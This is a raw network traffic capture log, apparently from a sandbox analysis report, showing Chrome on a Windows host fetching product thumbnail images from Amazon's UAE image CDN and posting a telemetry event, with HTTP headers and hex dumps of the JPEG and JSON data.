                                                                                                                                                                                                        2024-08-15 13:38:00 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 3859
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 1666ae24-375d-4b4b-99ae-d45c4c07a5ad
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 08 Aug 2023 07:14:49 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Thu, 02 Jun 2044 08:08:31 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 713718
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:00 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100130-IAD, cache-nyc-kteb1890059-NYC
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 01 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 09 0a 07 08 02 05 06 04 03 01 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 06 07 08 05 09 01 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 92 01 ec c6 37 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIFt"67
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: 5a 24 6e 98 ea 42 1d 0f 63 6b 89 0f c1 c0 cf a7 f8 ae e8 da 74 5c 37 31 fa c3 7a d2 09 90 a6 5b c8 b9 24 c0 25 dd cc 39 3b 2e 59 a4 bf 0b 80 68 88 1e e8 c7 ce d0 8e 3d e3 c3 2b 32 e2 e5 9a 2d b9 4b 9e 50 c1 4a b0 60 cc 92 f2 89 79 81 ac 05 da e0 08 06 ba af 57 27 33 95 82 d7 83 6d 1c d3 2e 82 05 d9 e2 33 f6 b8 8f 3a 3b b4 72 d3 06 76 32 64 d4 b7 25 32 26 49 82 68 50 23 d9 a8 06 c2 0b 9c 2e 03 04 36 53 45 ae 33 7b 9b 27 e0 85 af 17 7d 79 c7 78 93 69 99 24 9c 84 e5 53 1d c9 b3 25 5b 24 81 78 54 37 84 34 f1 d0 14 41 37 34 c5 34 53 99 b9 3c 63 de eb 6f 64 39 ec e3 ba ab db 2c 98 92 97 23 90 64 ab 6a a3 f7 08 da 42 17 0f 9d 79 4d 48 35 e7 a3 10 0f 67 83 3a 0c e7 68 f7 1b 51 de 4d 79 b6 e4 23 82 17 b4 4b 2d 40 bc 56 11 a9 09 29 1f 53 d5 13 c0 9f 55 c7 d5 75 38
                                                                                                                                                                                                        Data Ascii: Z$nBckt\71z[$%9;.Yh=+2-KPJ`yW'3m.3:;rv2d%2&IhP#.6SE3{'}yxi$S%[$xT74A744S<cod9,#djByMH5g:hQMy#K-@V)SUu8
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1103INData Raw: 97 ac 77 96 55 22 7c af 6f 08 c6 d9 24 09 f2 36 54 81 32 ce 98 c7 c3 da b6 55 86 db ca fb 8a c8 00 0d 1b dc c9 21 0f b8 9f ff c4 00 34 11 00 01 02 04 05 01 05 07 03 05 00 00 00 00 00 00 01 02 11 03 04 05 06 00 07 12 21 31 41 08 14 30 51 91 13 15 22 32 34 40 61 35 36 42 72 81 a1 b1 d1 ff da 00 08 01 02 01 01 3f 00 fb 02 42 41 52 8e 90 03 92 76 00 0d dd f1 9b bd a0 2a 46 a5 1e d2 b1 10 4a 9f bb 54 2b a9 dc bb 8f a0 03 72 5c 36 ac 53 67 73 c2 c8 a4 4d 5e b5 3a 8d 5a 2d 20 04 ad 50 6b 45 2a 3a 54 76 74 12 4b 29 88 49 23 cd b1 95 d9 97 4f cc aa 32 a7 e5 de 4a 76 9e 53 02 a3 08 b3 05 00 09 29 24 fc 8a 50 2a 72 ec 4f 2c c9 1e 07 68 2b fa 2d a9 6b 9a 55 3d 60 d5 aa e9 32 c8 d2 58 a6 12 80 d4 a0 db ee cc fe 43 1d 9c 72 b6 14 c4 01 7c d7 21 fb 45 2d 60 d0 02 ff 00
                                                                                                                                                                                                        Data Ascii: wU"|o$6T2U!4!1A0Q"24@a56Br?BARv*FJT+r\6SgsM^:Z- PkE*:TvtK)I#O2JvS)$P*rO,h+-kU=`2XCr|!E-`


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        37192.168.2.449797151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC704OUTGET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332323_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 4521
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: b2838d18-e75b-494e-bee9-fcb20f579677
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 08 Aug 2023 07:14:49 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Thu, 02 Jun 2044 08:08:31 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1494649
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:00 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100027-IAD, cache-ewr-kewr1740043-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 3a 00 01 00 00 06 03 01 01 00 00 00 00 00 00 00 00 00 00 03 06 07 08 09 0a 02 04 05 01 0b 01 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 07 08 05 06 01 04 09 02 03 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 c9 00 f6 62 9b 80 00 00
                                                                                                                                                                                                        Data Ascii: JFIFt":b
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: 4b 6e 8d dc e2 5a ba 03 07 5d 99 21 f3 da c7 45 24 0e 71 0f ef 3e 9d 11 10 5d 4a 34 7d 36 d7 e7 76 45 9f 8c 99 66 d9 19 52 c0 e2 89 59 6e 38 97 47 aa ac 3e 0f 17 da 49 a6 4a 2c 77 eb 10 c5 58 f4 2a ef 51 4a b7 a1 86 3d fc 51 00 2c 90 50 50 44 94 2e 9b 34 1d 91 a0 51 11 06 43 13 05 a0 41 c2 7f 0d 5a 5f 85 26 83 11 73 07 e9 c1 00 19 0d a5 b6 62 ba d5 6d 91 fb 57 f8 77 0c 9e 1a db 1b 34 6c 97 b4 64 ed b9 8b 73 29 9b c2 3d a5 af 7b 5d 83 e7 d4 ad b6 73 d8 95 aa 4b 9b ea 03 b8 07 5b f9 62 98 b0 cb af e8 f3 c5 c9 fa 38 ee b6 57 29 df 95 57 15 d9 b3 c7 ac 3b 3f c3 e1 b2 c5 d0 9a d6 db a6 d7 50 a5 cc 3a d9 a6 db 73 8d 9e 0a d6 c9 19 e7 93 da 8e 6a 91 20 cf 77 0e 2f fd 2e 17 d9 01 5d 05 ff 00 ec 6d de e6 4b a3 f3 7f 97 73 2b 95 96 c8 ca cc cd 4c da 9e 99 a4 d5 9a
                                                                                                                                                                                                        Data Ascii: KnZ]!E$q>]J4}6vEfRYn8G>IJ,wX*QJ=Q,PPD.4QCAZ_&sbmWw4lds)={]sK[b8W)W;?P:sj w/.]mKs+L
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: 3d 58 bc 13 9b 83 8c 66 db 9a a4 4e a4 58 90 92 a5 0d c2 b3 cd f6 fe 7e ba b8 55 53 0d 89 1e d5 68 a2 f4 c3 12 c7 0d ae 43 76 1c 85 d1 ee f2 dc a3 d1 4e a9 03 f1 90 9f 79 39 a2 1e aa b2 12 06 49 e8 99 0d 12 33 15 5d f0 71 a2 84 6b 32 ba cc aa aa af 8e ae ac 89 7a 83 4f 89 36 89 c9 e7 d2 33 92 4b a4 64 48 da bc 50 23 74 f1 da 48 90 4d 26 0e 7a 4f dd df 74 14 ed 80 b6 03 50 78 1e 4c e3 d8 68 72 72 35 1a 72 45 39 71 b7 54 1d dc 1f 6f 97 d1 02 1b e5 1d cd 76 bf 26 0c 10 f5 2a 20 3e 87 d3 27 cd 18 d0 fe f7 5b 7c 28 d1 18 53 4a 72 e4 af cf fc db 04 d0 72 7c e5 3d f7 40 bb 5d 6a ee 63 59 ed b1 b9 c8 6f 70 da f5 57 74 1a f6 6d 92 cd a4 ed 55 2e e8 e5 0b 35 30 dd 20 24 6b a1 ae 93 e9 12 49 91 5c 22 1d 12 6b 45 45 4d 8a 98 26 cb 34 ae b5 33 96 99 f0 6d a0 30 1c ee
                                                                                                                                                                                                        Data Ascii: =XfNX~UShCvNy9I3]qk2zO63KdHP#tHM&zOtPxLhrr5rE9qTov&* >'[|(SJrr|=@]jcYopWtmU.50 $kI\"kEEM&43m0
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC387INData Raw: 9d e3 13 cb 2e 53 9d 92 ba b7 6c 59 83 c8 83 37 41 15 ac f8 4e 99 f3 14 8d 4e 84 b9 ba a9 7a 51 c4 28 27 e1 19 67 ef fb 7f 5d 9b c6 c5 82 8c 0d c6 9f a9 11 50 72 a0 20 47 d0 48 91 4b 92 a4 89 d3 4c d3 29 d4 8a 9b 31 a7 54 dc ca 91 b9 4b 81 34 14 99 ad 29 11 1d 88 30 ab 9b d3 62 c5 3b 01 7a e8 bf 22 e9 83 07 4a 5e d7 3d 2d 89 58 dc 70 f3 a2 a4 2e 22 f5 6f 1f 11 d6 4f 51 5f f9 1d 3b c0 49 03 99 8b 60 2c 26 1a 13 07 15 03 e6 cf da 0e 80 c1 11 d8 d8 9e eb 83 92 44 ea a2 29 35 1c c7 90 c8 db 09 a1 c2 98 c3 05 25 c2 29 d0 dc 6c 5a d7 74 06 eb f4 bb 37 be 11 24 df 9f 17 c5 7a 9d 24 5b 7d db ac ba b4 ac d8 81 0f 0d 26 f5 69 e2 17 72 33 35 8f 6c f2 05 5a 45 49 15 5e 4c a4 11 17 88 3a 41 1c e8 35 d2 99 fa 77 41 82 08 cc 19 16 c1 58 c0 2f 4a 12 2f 8e 2c 00 06 93 90
                                                                                                                                                                                                        Data Ascii: .SlY7ANNzQ('g]Pr GHKL)1TK4)0b;z"J^=-Xp."oOQ_;I`,&D)5%)lZt7$z$[}&ir35lZEI^L:A5wAX/J/,


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        38192.168.2.449795151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC704OUTGET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332324_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 5427
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 92ff835b-cb5b-4647-8383-02f9c0e4a52d
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 08 Aug 2023 07:14:49 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Thu, 02 Jun 2044 08:08:31 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 116807
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:00 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000020-IAD, cache-ewr-kewr1740070-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 39 00 01 00 02 02 02 03 01 00 00 00 00 00 00 00 00 00 00 07 09 06 08 03 0a 01 04 05 02 01 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 06 07 05 08 01 03 09 04 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b2 01 ec c6 9b 80 00 00 03
                                                                                                                                                                                                        Data Ascii: JFIFt"9
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: 7a 4d c5 b6 b0 4e c6 fe cf 0d 9b 1a 31 db 5d 2d ba d9 0b 77 07 5a ef ad 8b aa f8 76 91 f5 ae ef 45 9a d4 86 57 c9 4f d1 87 cc a3 43 ac 96 d7 04 92 57 06 45 6d 3d 06 bb e8 91 be c5 3c 87 e5 34 3e ec f9 cc 80 a0 86 1a e0 d8 52 40 4d 12 0a 6e cf a0 9c 0f 7d a3 91 b1 f8 37 fe bd ff 00 af 15 eb a7 be e5 de e9 6a 36 8d e4 89 89 d6 ee 80 95 56 ec 4e 19 64 39 e7 ba 72 8c 7e 27 50 2a 5f e3 32 58 e7 2c e7 49 35 30 45 c6 ee 90 16 fe d0 37 93 0d f4 67 09 aa bb 0f 6e 55 70 70 91 61 f5 18 e9 c2 64 97 24 f1 5a b8 c2 62 02 a1 97 92 16 d3 e2 c8 d3 fa 47 22 31 e3 23 d9 af 7f 3d 31 84 89 5b 4c 78 39 f0 c1 f6 b4 5b 95 12 47 97 b1 1e 9e dc c1 d9 ea fe 14 10 f5 7e 06 91 63 1d 5f ee e3 b1 7c 21 70 e5 78 89 75 92 b8 b3 9e f3 65 0e c8 cf d9 ba 75 ba a5 33 12 5e f2 45 06 45 d8 8a
                                                                                                                                                                                                        Data Ascii: zMN1]-wZvEWOCWEm=<4>R@Mn}7j6VNd9r~'P*_2X,I50E7gnUppad$ZbG"1#=1[Lx9[G~c_|!pxueu3^EE
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: 24 2d 7f 14 b2 38 67 cb f8 04 57 fb 77 e3 30 52 09 b2 44 82 44 aa 5e 7c 62 fb 16 b6 ab 73 c7 38 2e 5b d6 ed ac f8 aa 1d cb 19 c6 a7 22 57 df 10 37 c8 ab e1 fb 53 b5 3d 0a ae 58 3a e2 7e b3 8d 92 94 4a 1f 27 2e d7 37 37 9e 0e 65 59 22 62 98 93 32 df 7c 93 a4 2a b8 10 51 94 0b f8 3f 17 1d f7 ba cf da c5 f1 47 ac e0 63 e6 b8 78 3a e9 8e 22 c6 4a 25 03 7c d3 1c e0 b1 bc d9 36 46 e4 da 95 50 c1 cc 5e e1 49 20 1e c7 8c 2b 20 47 4d b1 7e ae ae d1 ea d6 30 db 9d c9 68 6b ac d7 9f c8 50 3f 4e 49 92 2f 95 1c a4 8c ab bb 1f 51 95 13 9c 23 bf 07 4a 29 fa 41 42 89 75 28 30 3b a0 b5 10 f5 30 70 31 f0 ca 0c 34 5b 31 8c bb 24 47 19 cc 91 c6 c8 fc dd 32 a9 3c a5 35 32 58 df 19 96 b2 cc c8 43 a6 b0 c4 1d 5e 34 56 08 7c dd 41 72 24 65 f8 43 76 3c 83 1b ee df 4d de 4a 34 64
                                                                                                                                                                                                        Data Ascii: $-8gWw0RDD^|bs8.["W7S=X:~J'.77eY"b2|*Q?Gcx:"J%|6FP^I + GM~0hkP?NI/Q#J)ABu(0;0p14[1$G2<52XC^4V|Ar$eCv<MJ4d
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1293INData Raw: 28 b9 b8 36 98 f9 8f 99 e3 31 76 82 cf 51 95 f1 f0 30 2e 7b 98 32 b7 b1 c5 79 59 c4 49 c3 d2 f3 56 76 90 01 20 92 08 21 3a 6f 3c 53 e5 1c c5 55 9a 29 9c 9a 5c 5e 4a 52 99 58 92 a4 a5 22 e6 77 20 40 d8 81 c1 46 20 b2 96 b9 16 33 3b 8b 19 13 e7 c3 1b db d6 5c 70 a3 76 68 72 5b 65 40 20 94 85 a8 24 80 41 23 48 30 41 13 29 22 0c de 78 c8 19 98 67 0c ac d8 f8 48 d7 89 86 12 b2 2e 35 a5 20 2a dd 49 fc 10 3c 55 d5 18 14 74 55 75 38 c6 12 8c 1c 4c 73 36 b0 48 bc d8 0b 89 bf 41 c5 7f c4 66 37 67 87 7d ff 00 55 78 e3 7b 80 a2 00 1e 7c 7c 75 48 7a ee f5 6d 69 b1 b8 b5 bc b9 8b 1e 3b 35 0d 18 38 ca ad c0 6d 78 34 cd c9 5e 3e 62 94 95 25 40 a2 d2 22 c9 92 44 12 52 7d 4c 0a c7 34 54 56 2b 42 4a 51 a9 5a 01 1b 09 90 3f d4 72 80 00 8b 71 8f 8b 71 ea 3f 23 6f c1 e5 c7 b2
                                                                                                                                                                                                        Data Ascii: (61vQ0.{2yYIVv !:o<SU)\^JRX"w @F 3;\pvhr[e@ $A#H0A)"xgH.5 *I<UtUu8Ls6HAf7g}Ux{||uHzmi;58mx4^>b%@"DR}L4TV+BJQZ?rqq?#o


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        39192.168.2.44979052.95.122.734434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC648OUTPOST /1/events/com.amazon.csm.nexusclient.prod HTTP/1.1
                                                                                                                                                                                                        Host: unagi-eu.amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Origin: https://www.amazon.ae
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC477OUTData Raw: 7b 22 63 73 22 3a 7b 22 64 63 74 22 3a 7b 22 23 30 22 3a 22 72 65 71 75 65 73 74 49 64 22 2c 22 23 31 22 3a 22 58 52 52 42 56 45 54 52 36 36 53 33 54 39 37 42 4d 35 4b 46 22 2c 22 23 32 22 3a 22 73 65 72 76 65 72 22 2c 22 23 33 22 3a 22 77 77 77 2e 61 6d 61 7a 6f 6e 2e 61 65 22 2c 22 23 34 22 3a 22 6f 62 66 75 73 63 61 74 65 64 4d 61 72 6b 65 74 70 6c 61 63 65 49 64 22 2c 22 23 35 22 3a 22 41 32 56 49 47 51 33 35 52 43 53 34 55 47 22 2c 22 23 36 22 3a 22 70 72 6f 64 75 63 65 72 49 64 22 2c 22 23 37 22 3a 22 63 73 6d 22 2c 22 23 38 22 3a 22 73 63 68 65 6d 61 49 64 22 2c 22 23 39 22 3a 22 63 73 6d 2e 43 53 4d 42 61 73 65 6c 69 6e 65 45 76 65 6e 74 2e 34 22 2c 22 23 31 30 22 3a 22 74 69 6d 65 73 74 61 6d 70 22 2c 22 23 31 31 22 3a 22 6d 65 73 73 61 67 65 49
                                                                                                                                                                                                        Data Ascii: {"cs":{"dct":{"#0":"requestId","#1":"XRRBVETR66S3T97BM5KF","#2":"server","#3":"www.amazon.ae","#4":"obfuscatedMarketplaceId","#5":"A2VIGQ35RCS4UG","#6":"producerId","#7":"csm","#8":"schemaId","#9":"csm.CSMBaselineEvent.4","#10":"timestamp","#11":"messageI
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC541INHTTP/1.1 200 OK
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:00 GMT
                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                        Content-Length: 2
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        x-amz-rid: 7MDQ6SM91X1ED8ZQR4HQ
                                                                                                                                                                                                        x-amzn-RequestId: cb3567a2-c47d-4260-b31d-78d8fc39ed47
                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Access-Control-Expose-Headers: x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date
                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                        Vary: Origin,Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                        Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC2INData Raw: 7b 7d
                                                                                                                                                                                                        Data Ascii: {}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        40192.168.2.449806151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC704OUTGET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332325_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 5203
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: f1897c05-f795-44d9-a03b-2ec39760fe4b
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 08 Aug 2023 07:14:49 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Thu, 02 Jun 2044 08:08:31 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 172727
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:02 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000080-IAD, cache-nyc-kteb1890099-NYC
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
